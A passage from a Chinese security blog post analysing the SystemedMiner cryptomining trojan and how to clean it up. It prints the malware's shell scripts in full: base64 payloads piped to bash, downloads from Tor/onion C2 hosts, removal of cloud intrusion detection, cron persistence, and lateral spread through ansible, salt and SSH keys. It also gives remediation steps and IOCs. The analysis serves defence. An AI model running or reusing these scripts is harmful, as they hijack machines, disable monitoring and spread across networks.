class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line">exec &amp;&gt;/dev/null</span><br><span class="line">export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin</span><br><span class="line"></span><br><span class="line">d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)</span><br><span class="line">c=$(echo &quot;curl -4fsSLkA- -m200&quot;)</span><br><span class="line">t=$(echo &quot;5ixhieezozxwnvisopgxoba6ssbsrvdpxeduxb4jc6zx7s56rufrjzad&quot;)</span><br><span class="line"></span><br><span class="line">sockz() &#123;</span><br><span class="line">n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)</span><br><span class="line">p=$(echo &quot;dns-query?name=relay.tor2socks.in&quot;)</span><br><span class="line">s=$($c https://$&#123;n[$((RANDOM%11))]&#125;/$p | grep -oE &quot;\b([0-9]&#123;1,3&#125;\.)&#123;3&#125;[0-9]&#123;1,3&#125;\b&quot; |tr &#x27; &#x27; &#x27;\n&#x27;|grep -Ev [.]0|sort -uR|head -n 1)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">fexe() &#123;</span><br><span class="line">for i in . $HOME /usr/bin $d /tmp /var/tmp ;do echo exit &gt; $i/i &amp;&amp; chmod +x $i/i &amp;&amp; cd $i &amp;&amp; ./i &amp;&amp; rm -f i &amp;&amp; break;done</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">isys() &#123; </span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">写入定时任务，并且卸载assist-daemon(阿里云)、qcloud(腾讯云)的入侵检测系统</span></span><br><span class="line">echo ZnVuY3Rpb24ga3VybCgpIHsKICByZWFkIHByb3RvIHNlcnZlciBwYXRoIDw8PCQoZWNobyAkezEvLy8vIH0pCiAgRE9DPS8ke3BhdGgvLyAvL30KICBIT1NUPSR7c2VydmVyLy86Kn0KICBQT1JUPSR7c2VydmVyLy8qOnKICBbWyB4IiR7SE9TVH0iID09IHgiJHtQT1JUfSIgXV0gJiYgUE9SVD04MAoKICBleGVjIDM8Pi9kZXYvdGNwLyR7SE9TVH0vJFBPUlQKICBlY2hvIC1lbiAiR0VUICR7RE9DfSBIVFRQLzEuMFxyXG5Ib3N0OiAke0hPU1R9XHJcblxyXG4iID4mMwogICh3aGlsZSByZWFkIGxpbmU7IGRvCiAgIFtbICIkbGluZSIgPT0gJCdccicgXV0gJiYgYnJlYWsKICBkb25lICYmIGNhdCkgPCYzCiAgZXhlYyAzPiYtCn0KCnJtIC1mICRIT01FL3NzCmN1cmwgLVYgfHwgd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vbW9wYXJpc3RoZWJlc3Qvc3RhdGljLWN1cmwvcmVsZWFzZXMvZG93bmxvYWQvdjcuNzUuMC9jdXJsLWFtZDY0IC1PICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApjdXJsIC1WIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvY3VybCA+ICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApzcyAtdiAgIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvc3MgICA+ICRIT01FL3NzO2NobW9kICt4ICRIT01FL3NzCnNzIC12ICAgfHwgY3VybCAtcyBodHRwOi8vMTM5LjU5LjE1MC43OjQ0My9zcyAtbyAkSE9NRS9zcztjaG1vZCAreCAkSE9NRS9zcwpwcyAgICAgIHx8IGN1cmwgLXMgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvcHMgLW8gJEhPTUUvcHM7Y2htb2QgK3ggJEhPTUUvcHMK|base64 -d|bash</span><br><span class="line">crontab -l || yum -y install cron</span><br><span class="line">crontab -l || yum -y install cronie</span><br><span class="line">crontab -l || apt-get update &amp;&amp; apt-get -y install cron</span><br><span class="line">/usr/local/share/assist-daemon/assist_daemon --stop</span><br><span class="line">/usr/local/share/assist-daemon/assist_daemon --delete</span><br><span class="line">/usr/local/qcloud/monitor/barad/admin/uninstall.sh</span><br><span class="line">/usr/local/qcloud/stargate/admin/uninstall.sh</span><br><span class="line">/usr/local/qcloud/YunJing/uninst.sh</span><br><span class="line">/etc/init.d/aegis uninstall</span><br><span class="line">systemctl stop aliyun</span><br><span class="line">systemctl disable aliyun</span><br><span class="line">systemctl start cron</span><br><span class="line">systemctl enable cron</span><br><span class="line">systemctl start crond</span><br><span class="line">systemctl enable crond</span><br><span class="line">rm -rf /usr/loca/qcloud/ /usr/local/aegis/ /usr/local/share/assist-daemon/ /usr/local/share/aliyun-assist/ /usr/sbin/aliyun-service /usr/sbin/aliyun_installer /etc/systemd/system/aliyun.service</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">issh() &#123;</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">利用自动化运维工具ansible、salt、pssh、knife写入定时任务</span></span><br><span class="line">ansible all -m shell -a &#x27;echo blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash&#x27;</span><br><span class="line">knife ssh &#x27;name:*&#x27; &#x27;echo 与上面的base64编码一致，都是守护进程|base64 -d|bash&#x27;</span><br><span class="line">salt &#x27;*&#x27; cmd.run &#x27;echo 与上面的base64编码一致，都是守护进程|base64 -d|bash&#x27;</span><br><span class="line">pssh &#x27;echo 与上面的base64编码一致，都是守护进程|base64 -d|bash&#x27;</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">从bash的历史ssh记录中尝试去登录远程设备</span></span><br><span class="line">hosts=$(grep -oE &quot;\b([0-9]&#123;1,3&#125;\.)&#123;3&#125;[0-9]&#123;1,3&#125;\b&quot; ~/.bash_history /etc/hosts ~/.ssh/known_hosts |grep -v ^127.|awk -F: &#123;&#x27;print $2&#x27;&#125;|sort|uniq)</span><br><span class="line">for h in $hosts;do ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no -l root  $h &#x27;echo 与上面的base64编码一致，都是守护进程|base64 -d|bash&#x27;;done for h in $hosts;do ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no -l $USER $h &#x27;与上面的base64编码一致，都是守护进程|base64 -d|bash&#x27;;done</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">ibot() &#123;</span><br><span class="line">f=/bot </span><br><span class="line">r=$(curl -4fsSLk ip.sb||wget -4qO- ip.sb||curl -4fsSLk checkip.amazonaws.com)_$(whoami)_$(uname -m)_$(uname -n)_$(crontab -l|base64 -w0)</span><br><span class="line"><span class="meta prompt_">$</span><span class="language-bash">c -x socks5h://<span class="variable">$s</span>:9050 -e<span class="variable">$r</span> <span class="variable">$t</span>.onion<span class="variable">$f</span> || <span class="variable">$c</span> -e<span class="variable">$r</span> $1<span class="variable">$f</span></span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">iscn() &#123;</span><br><span class="line">pkill -9 -f tracepath</span><br><span class="line">f=/trc </span><br><span class="line">x=./$(date|md5sum|cut -f1 -d-)</span><br><span class="line"><span class="meta prompt_">$</span><span class="language-bash">c -x socks5h://<span class="variable">$s</span>:9050 <span class="variable">$t</span>.onion<span class="variable">$f</span> -o<span class="variable">$x</span> || <span class="variable">$c</span> $1<span class="variable">$f</span> -o<span class="variable">$x</span></span></span><br><span class="line">chmod +x $x;$x;rm -f $x</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">sockz</span><br><span class="line">fexe</span><br><span class="line">isys</span><br><span class="line">issh &amp;</span><br><span class="line">ibot $t.tor2web.in || ibot $t.tor2web.it</span><br><span class="line">iscn $t.tor2web.in || iscn $t.tor2web.it</span><br></pre></td></tr></table></figure>

<p>这个脚本的作用是先将阿里云和腾讯云的入侵检测系统给卸载掉，然后再利用自动化运维工具写入定时任务，最后就是下载两个可执行文件，一个是<code>bot</code>，一个是<code>trc</code>，其中<code>trc</code>文件用于Hadoop Yarn未授权访问漏洞利用，bot大概率是该病毒的传播模块</p>
<ul>
<li><strong>下载挖矿文件cpu</strong></li>
</ul>
<p>病毒母体执行后会下载cpu脚本,以进行挖矿，手动下载一下试试看：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -4fsSLkA- -m200 fjuoqusekcob5av5rww3nxgscdrq5dgm7w535qe2ekudln4azyzqkzad.tor2web.in/cpu -o  cpu -e183.134.110.75</span><br></pre></td></tr></table></figure>

<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051112832.png" alt="在这里插入图片描述"></p>
<p>手动执行挖矿脚本的时候要先解除文件的锁定<code>chattr -i cpu</code>，再赋权限运行</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051112729.png" alt="在这里插入图片描述"></p>
<p>但是在本地也没有运行起来，缺失一些配置文件，可能是因为前面的模块有的没有下载导致。</p>
<ul>
<li><strong>状态控制</strong></li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">exec &amp;&gt;/dev/null</span><br><span class="line">export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin</span><br><span class="line"></span><br><span class="line">d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)</span><br><span class="line">c=$(echo &quot;curl -4fsSLkA- -m200&quot;)</span><br><span class="line">t=$(echo &quot;i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad&quot;)</span><br><span class="line"></span><br><span class="line">sockz() &#123;</span><br><span class="line">n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)</span><br><span class="line">p=$(echo &quot;dns-query?name=relay.tor2socks.in&quot;)</span><br><span class="line">s=$($c https://$&#123;n[$((RANDOM%11))]&#125;/$p | grep -oE &quot;\b([0-9]&#123;1,3&#125;\.)&#123;3&#125;[0-9]&#123;1,3&#125;\b&quot; |tr &#x27; &#x27; &#x27;\n&#x27;|grep -Ev [.]0|sort -uR|head -n 1)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">u() &#123;</span><br><span class="line">sockz</span><br><span class="line">f=/cmd</span><br><span class="line"><span class="meta prompt_">$</span><span class="language-bash">c -x socks5h://<span class="variable">$s</span>:9050 <span class="variable">$t</span>.onion<span class="variable">$f</span> || <span class="variable">$c</span> $1<span class="variable">$f</span></span></span><br><span class="line">&#125;</span><br><span class="line">(</span><br><span class="line">u $t.tor</span><br></pre></td></tr></table></figure>

<p>病毒母体执行后会下载cmd脚本，用于当主机网络无法连接到矿池时，会结束掉自身的挖矿进程，增强隐蔽性，但是tor代理失效，暂时无法下载</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -4fsSLkA- -m200 fjuoqusekcob5av5rww3nxgscdrq5dgm7w535qe2ekudln4azyzqkzad.tor2web.in/cmd -o  cmd -e183.134.110.75</span><br></pre></td></tr></table></figure>

<p>如果用这种方法下载的话，很奇怪会得到下载ssh暴力破解的脚本，脚本内容也无法进行下载查看</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051112798.png" alt="在这里插入图片描述"></p>
<h4 id="归纳梳理"><a href="#归纳梳理" class="headerlink" title="归纳梳理"></a>归纳梳理</h4><p>通过看师傅们的博客和自己的测试，对目前这个SystemedMiner挖矿木马也有了一定的了解，木马执行后，会下载一系列的模块和可执行脚本，用于持久化、内网横向渗透、挖矿、命令控制、清除一些入侵检测系统和其他挖矿程序，但需要使用tor代理，之所以服务器和虚拟机只有持久化的脚本(守护进程脚本)，就是因为病毒母体启动后，tor代理失效，无法下载其他模块和脚本，也就只有一个守护进程脚本。</p>
<h4 id="处置方法"><a href="#处置方法" class="headerlink" title="处置方法"></a>处置方法</h4><p>在了解了SystemedMiner挖矿木马感染机器的过程后，防护便一目了然了，它做的主机持久化控制便是通过写定时任务，而定时任务是下载病毒母体并执行，就这样循环来控制主机，所以要清除该病毒文件</p>
<ol>
<li>第一步便是要将定时任务删除完，通过<code>crontab -e</code>移除<code>/root/systemd-private-*</code>，然后再删除<code>/etc/cron.d/0systemd-private-* </code>和<code>/opt/systemd-private-*.sh</code>文件</li>
<li>再去查看<code>/tmp/.X11-unix/</code>文件下<code>01</code>、<code>11</code>获取其PID，使用<code>kill -9 进程id</code>，杀死进程</li>
<li>更改文件夹权限，再不清楚攻击者从哪里进来的时候，<code>/tmp/.X11-unix/</code>这个文件夹可以进行保留，防止黑客重新写入，但要设置好权限</li>
</ol>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">chattr +i [file/directory]使file/directory无法被更动</span></span><br><span class="line">chattr +i /tmp/.X11-unix/01</span><br><span class="line">或</span><br><span class="line">chmod -R 000 /tmp/.X11-unix/01</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">查看文件夹权限</span></span><br><span class="line">ls -ld /tmp/.X11-unix/ </span><br></pre></td></tr></table></figure>

<p>4.若服务器中运行了其他的一些模块和脚本，杀相关进程和文件，重复上面的方法即可</p>
<h4 id="溯源分析"><a href="#溯源分析" class="headerlink" title="溯源分析"></a>溯源分析</h4><blockquote>
<p>该木马通过bash命令下载执行多个功能模块，通过SSH暴力破解、SSH免密登录利用、Hadoop Yarn未授权访问漏洞和自动化运维工具内网扩散，且该木马的文件下载均利用暗网代理，感染后会清除主机上的其他挖矿木马，以达到资源独占的目的</p>
</blockquote>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051112353.png" alt="在这里插入图片描述"></p>
<p>看了很多类似挖矿木马的文章，黑客入口都指向Hadoop Yarn未授权访问或是SSH爆破密码，既然内网的主机全被感染了，逐一来排查一下</p>
<h5 id="Hadoop-yarn-未授权访问漏洞"><a href="#Hadoop-yarn-未授权访问漏洞" class="headerlink" title="Hadoop-yarn-未授权访问漏洞"></a>Hadoop-yarn-未授权访问漏洞</h5><ul>
<li>影响版本：3.3.0 以下、</li>
<li>通过REST API创建并提交任务，YARN执行任务，下载执行恶意sh脚本</li>
</ul>
<p>先看一下当前服务器的Hadoop版本，版本在3.3.0以下，有未授权访问的风险</p>
<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051112429.png" alt="在这里插入图片描述"></p>
<p>可以查看下有关yarn的进程，看看有没有挖矿程序</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ps -ef | grep yarn</span><br></pre></td></tr></table></figure>

<p>查看了几天被感染的服务器都未发现相关信息，只能去排查一下YARN日志，看看是否有异常的<code>application</code>，204的主机曾关闭过防火墙，优先去排查一下204这台主机</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">yarn application -list -appStates ALL #不显示时间信息</span><br><span class="line">yarn logs -applicationId application_1647720164720_1130</span><br><span class="line"><span class="meta prompt_">#</span><span class="language-bash">匹配关键字</span></span><br><span class="line">yarn application -list -appStates ALL | grep curl</span><br></pre></td></tr></table></figure>

<p><img src="https://sn0w.oss-cn-shenzhen.aliyuncs.com/img/202304051112480.png" alt="在这里插入图片描述"></p>
<p>也没有发现什么线索。</p>
<p>既然在服务器上都没有下载出相应的控制、挖矿文件或模块，说明代理失效，那ssh模块也应该是无法下载的，猜测可能是自动化运维工具写入，但服务器上没有这一类工具，只能说明是利用SSH免密码登录进去的，这个病毒母体恰好有这个功能，恰好服务器也是有这个免登的功能，<strong>所以初步推断内网横向感染的原因就是因为免密码登录</strong></p>
<p>SSH暴力破解进入其他内网主机应该不太现实，因为都是强口令，不容易被爆破出来的，而且公司服务器都有防护，如果大量爆破发包的话也会产生警告，因此这样也可以排除是SSH爆破进入服务器的。</p>
<p>目前暂不能判断攻击者是从哪里进来的，只能先进行处置，保留病毒文件夹，修改权限，以防下次再写入</p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><ul>
<li>建议将免登取消掉，以防某一台感染后横向传染其他服务器</li>
</ul>
<h4 id="IOCS"><a href="#IOCS" class="headerlink" title="IOCS"></a>IOCS</h4><p>守护进程样本hash：<br>MD5 <code>d61b3ba654ad546cc49d5ace7de0e309</code><br>SHA-1 <code>ca852b6b7f5e52a17661456ae37e0e6009c87ac3</code><br>SHA-256 <code>7de2aa89cb2f2edf06418ad39d6c516c25bb52a5d1bf62332b0892bc2fa1c3d4</code></p>
<p>远控样本(int.x86_64)hash：<br>MD5 <code>7308d194a75c13e464d4a8cc8094bca7</code><br>SHA-1 <code>389889090811fb2a4063d03c0ecafb33b8c68b12</code><br>SHA-256 <code>7834430c0d7953648e906a679ae6e92d6807305220639df41bff72dceb09e94f</code></p>
<p><code>fjuoqusekcob5av5rww3nxgscdrq5dgm7w535qe2ekudln4azyzqkzad.onion</code><br><code>fjuoqusekcob5av5rww3nxgscdrq5dgm7w535qe2ekudln4azyzqkzad.tor2web.it</code> ——C&amp;C域名<br><code>fjuoqusekcob5av5rww3nxgscdrq5dgm7w535qe2ekudln4azyzqkzad.tor2web.in</code> ——C&amp;C域名</p>
<h4 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h4><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/233138.html">https://www.freebuf.com/articles/system/233138.html</a></p>
<p><a target="_blank" rel="noopener" href="https://bbs.sangfor.com.cn/forum.php?mod=viewthread&amp;tid=144683">https://bbs.sangfor.com.cn/forum.php?mod=viewthread&amp;tid=144683</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/system/225146.html">https://www.freebuf.com/articles/system/225146.html</a></p>
<p><a target="_blank" rel="noopener" href="https://hksanduo.github.io/2021/11/08/2021-11-08-systemd-miner-analysis/">https://hksanduo.github.io/2021/11/08/2021-11-08-systemd-miner-analysis/</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/279000.html">https://www.freebuf.com/articles/web/279000.html</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/370493577">https://zhuanlan.zhihu.com/p/370493577</a></p>
<p><a target="_blank" rel="noopener" href="https://www.codenong.com/cs106872151/cl">https://www.codenong.com/cs106872151/cl</a></p>
<p><a target="_blank" rel="noopener" href="http://les1ie.com/2021/07/12/tor-miner/">http://les1ie.com/2021/07/12/tor-miner/</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/tor2web/Tor2web">https://github.com/tor2web/Tor2web</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.kanxue.com/article-10818.htm">https://zhuanlan.kanxue.com/article-10818.htm</a></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2019/05/03/Thinkphp3.2.3-%5B%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%5D/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
              2022-04-01 12:03:35
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="Tags"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/" title="应急响应">
                        #应急响应
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
              <a href="/2022/06/10/%5B2022.5.31%5D%E6%A8%A1%E6%9D%BF%E6%94%BB%E5%9D%9A-dk_vue_2.0%E8%B4%B7%E6%AC%BE%E6%A8%A1%E6%9D%BF/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SystemedMiner%E6%8C%96%E7%9F%BF%E6%9C%A8%E9%A9%AC%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%84%E7%BD%AE"><span class="toc-text">SystemedMiner挖矿木马分析与处置</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%99%9A%E6%8B%9F%E6%9C%BA%E6%89%A7%E8%A1%8C%E6%B5%8B%E8%AF%95"><span class="toc-text">虚拟机执行测试</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%BD%92%E7%BA%B3%E6%A2%B3%E7%90%86"><span class="toc-text">归纳梳理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%A4%84%E7%BD%AE%E6%96%B9%E6%B3%95"><span class="toc-text">处置方法</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%BA%AF%E6%BA%90%E5%88%86%E6%9E%90"><span class="toc-text">溯源分析</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#Hadoop-yarn-%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E"><span class="toc-text">Hadoop-yarn-未授权访问漏洞</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#IOCS"><span class="toc-text">IOCS</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="toc-text">参考文章</span></a></li></ol></li></ol></li></ol></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/Ga1a3y">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="rss" href="/atom.xml">
            <i class="iconfont icon-rss"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/Ga1a3y">Copyright © Ga1a3y 2023</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
